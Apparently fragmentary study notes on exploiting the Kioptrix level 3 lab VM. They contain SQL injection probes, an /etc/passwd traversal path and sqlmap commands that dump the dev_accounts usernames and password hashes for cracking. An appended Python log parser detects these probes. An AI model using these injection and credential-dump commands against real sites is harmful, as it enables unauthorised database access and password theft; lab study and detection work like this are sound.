
VMW - Kioptrix level 1.3


2. https://blog.g0tmi1k.com/2011/08/kioptrix-level-3 … shows commands and videos but doesn't explain what those select statements do, unlike the site above. Those select statements can be bypassed if sqlmap is used instead to get the hash.
  1. https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
  2. https://digital-cowboy.github.io/2017/kioptrix-level-3-walkthrough/



  1. Open services: SSH and HTTP
    1. Apache 2.2.8, PHP 5.2.4, ubuntu 5.6
  2. http://kioptrix3.com/gallery/gallery.php?id=1'
The thing that really caught our eye here was the "id" parameter in the URL, so we attempted to inject a single quote ( ' ) to see if the application was vulnerable to SQL injection. And yes! It is vulnerable to SQL injection, because it throws the error –
Our links should look like this:
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7-- (error: Unknown column)
We increase N in "order by N" until the Unknown column error appears. If the error shows up at N, the query has N-1 columns, because order by N-1 still returned the content; in this case the number of columns is 6.

  1. LFI: didn't work without the .html suffix
    1. http://IP/index.php?system=../../../../../etc/passwd.html
  2. Looked at the source of all the pages and found the Gallarific module, which was commented out and susceptible to SQL injection
  3. In /pentest/exploits/exploitdb or /usr/share/exploitdb: grep -i gallarific files.csv
  4. The login page shows it is a LotusCMS application. One could use Metasploit to exploit the vulnerability
  5. python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs will show the database names (but sqlmap is not allowed in the exam)
    1. python sqlmap.py -u "http://www.example.com/news.php?id=11" -D db363851433 --tables
       where db363851433 is the name of the database
    2. python sqlmap.py -u "http://www.example.com/news.php?id=11" -D gallery -T dev_accounts -C id,password,username --dump will show the table with the usernames and hashes, which can be cracked within Kali or online [https://www.yeahhub.com/live-sql-injection-exploitation-sqlmap-detailed-guide/]
  6. You can also use the "hash-identifier" tool to verify the hash type, whether it is MD5, SHA1 or any other
  7. "To crack the hash, you can also use the hashcat tool, which is pre-installed in the Kali Linux machine"
From <https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/>
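As an added, defender-side example that is not part of these notes or of any of the linked walkthroughs: a small Python script that parses Apache access-log lines and flags the two probe patterns described above, the "order by N" column-count enumeration against gallery.php?id= and the ../../etc/passwd traversal against index.php?system=. The log lines, client IPs and timestamps are constructed, and the min_probes grouping threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed Apache combined-log sample (not from the page or the VM): one client
# tests id=1', walks ORDER BY 5..7 on gallery.php, then probes index.php?system= for LFI.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /gallery/gallery.php?id=1%27 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /gallery/gallery.php?id=1%20order%20by%205-- HTTP/1.1" 200 4100
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /gallery/gallery.php?id=1%20order%20by%206-- HTTP/1.1" 200 4100
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /gallery/gallery.php?id=1%20order%20by%207-- HTTP/1.1" 200 380
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?system=../../../../../etc/passwd HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /gallery/gallery.php?id=2 HTTP/1.1" 200 4100
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.IGNORECASE)      # ORDER BY N column probe
LFI_RE = re.compile(r"(\.\./){2,}[\w./]*etc/passwd", re.IGNORECASE)  # traversal to /etc/passwd

def parse_line(line):
    """Split one log line into client ip, request path and URL-decoded query params."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"ip": m.group("ip"), "path": path, "params": params}

def analyze(log_text, min_probes=3):
    """Return sorted (ip, kind, detail) findings; min_probes is an assumed threshold."""
    findings = set()
    order_by_hits = defaultdict(set)  # (ip, path, param) -> set of probed N values
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"].items():
            m = ORDER_BY_RE.search(value)
            if m:
                order_by_hits[(rec["ip"], rec["path"], name)].add(int(m.group(1)))
            if LFI_RE.search(value):
                findings.add((rec["ip"], "lfi_probe", f"{rec['path']}?{name}={value}"))
    # Several distinct ORDER BY N values from one client on one parameter is the
    # column-count enumeration described in the notes, not a single stray request.
    for (ip, path, name), ns in order_by_hits.items():
        if len(ns) >= min_probes:
            findings.add((ip, "sqli_column_count",
                          f"{path} param {name}: ORDER BY {min(ns)}..{max(ns)}"))
    return sorted(findings)
```

Pointing analyze() at a real access log (open the file and pass its text) gives the same tuples; the response sizes in the sample show the drop that accompanies the Unknown column error, which a fuller rule could also use.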